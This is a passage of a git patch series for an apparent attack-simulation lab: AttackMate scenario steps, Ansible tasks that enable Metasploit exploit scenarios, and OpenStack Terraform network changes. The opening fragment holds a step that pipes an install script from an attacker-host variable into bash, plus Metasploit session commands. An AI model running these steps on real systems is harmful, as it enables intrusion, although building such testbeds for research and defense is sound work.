cmd: "o" - interactive: True - - type: ssh - session: foothold - cmd: "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash\n" - interactive: True - - - type: ssh - session: foothold - cmd: "1B" - interactive: True - bin: True - - - type: ssh - session: foothold - cmd: ":wq\n" - interactive: True -################### MOVED ############################################ +#################### MOVED ############################################ - type: msf-session session: movement cmd: sysinfo @@ -173,3 +170,4 @@ commands: - type: msf-session session: movement cmd: systemctl stop exim4.service + From 29e8af9b2fcb85b3f288a2402306aeb598d03730 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 16:12:27 +0100 Subject: [PATCH 10/12] fetch uuid script --- terragrunt/fetch_network_uuid.sh | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 terragrunt/fetch_network_uuid.sh diff --git a/terragrunt/fetch_network_uuid.sh b/terragrunt/fetch_network_uuid.sh old mode 100644 new mode 100755 From 3d963320ccc41951d3c63ae5429afb53855e3b59 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 16:14:29 +0100 Subject: [PATCH 11/12] remove comments --- ansible/run/scenario3/main.yml | 94 +++++++++++++++++----------------- 1 file changed, 47 insertions(+), 47 deletions(-) diff --git a/ansible/run/scenario3/main.yml b/ansible/run/scenario3/main.yml index 11c180f..7c9faeb 100644 --- a/ansible/run/scenario3/main.yml +++ b/ansible/run/scenario3/main.yml @@ -50,18 +50,18 @@ - install - playbooks - # - name: "Run Scenario 3 a a" - # become: True - # become_user: "{{attacker_user}}" - # ansible.builtin.shell: - # cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_a.yml" - # chdir: "{{user_home.stdout}}" - # tags: - # - scenario_3_a_a - # - metasploit - # - attackmate - # - exploit - + - name: "Run Scenario 3 a a" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_a.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_a_a + - metasploit + - attackmate + - exploit + - name: "Run Scenario 3 a b" become: True become_user: "{{attacker_user}}" @@ -74,39 +74,39 @@ - attackmate - exploit - # - name: "Run Scenario 3 b" - # become: True - # become_user: "{{attacker_user}}" - # ansible.builtin.shell: - # cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" - # chdir: "{{user_home.stdout}}" - # tags: - # - scenario_3_b - # - metasploit - # - attackmate - # - exploit - - # - name: "Run Scenario 3 c" - # become: True - # become_user: "{{attacker_user}}" - # ansible.builtin.shell: - # cmd: "/usr/local/bin/attackmate-tmux scenario_3_c.yml" - # chdir: "{{user_home.stdout}}" - # tags: - # - scenario_3_c - # - metasploit - # - attackmate - # - exploit - - # - name: "Run Scenario 3 d" - # become: True - # become_user: "{{attacker_user}}" - # ansible.builtin.shell: - # cmd: "/usr/local/bin/attackmate-tmux scenario_3_d.yml" - # chdir: "{{user_home.stdout}}" - # tags: - # - scenario_3_d - # - metasploit - # - attackmate - # - exploit + - name: "Run Scenario 3 b" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_b + - metasploit + - attackmate + - exploit + + - name: "Run Scenario 3 c" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_c.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_c + - metasploit + - attackmate + - exploit + + - name: "Run Scenario 3 d" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_d.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_d + - metasploit + - attackmate + - exploit From 8df3b23d681d317d5a2f06d1a15ef9d4febda568 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 16:19:08 +0100 Subject: [PATCH 12/12] admin network --- terragrunt/videoserver/module/adminpc.tf | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/terragrunt/videoserver/module/adminpc.tf b/terragrunt/videoserver/module/adminpc.tf index 6baff51..b7be984 100644 --- a/terragrunt/videoserver/module/adminpc.tf +++ b/terragrunt/videoserver/module/adminpc.tf @@ -7,7 +7,7 @@ locals { # CREATE INSTANCE for "ADMINPC" # -data "external" "lan_uuid" { +data "external" "admin_uuid" { program = ["bash", "./fetch_network_uuid.sh"] query = { @@ -44,7 +44,7 @@ resource "openstack_compute_instance_v2" "adminpc" { user_data = local.ext_adminpc_userdata_file == null ? null : data.template_cloudinit_config.cloudinitadminpc[0].rendered network { - name = "admin" + uuid = "${data.external.admin_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.admin_cidr,222) }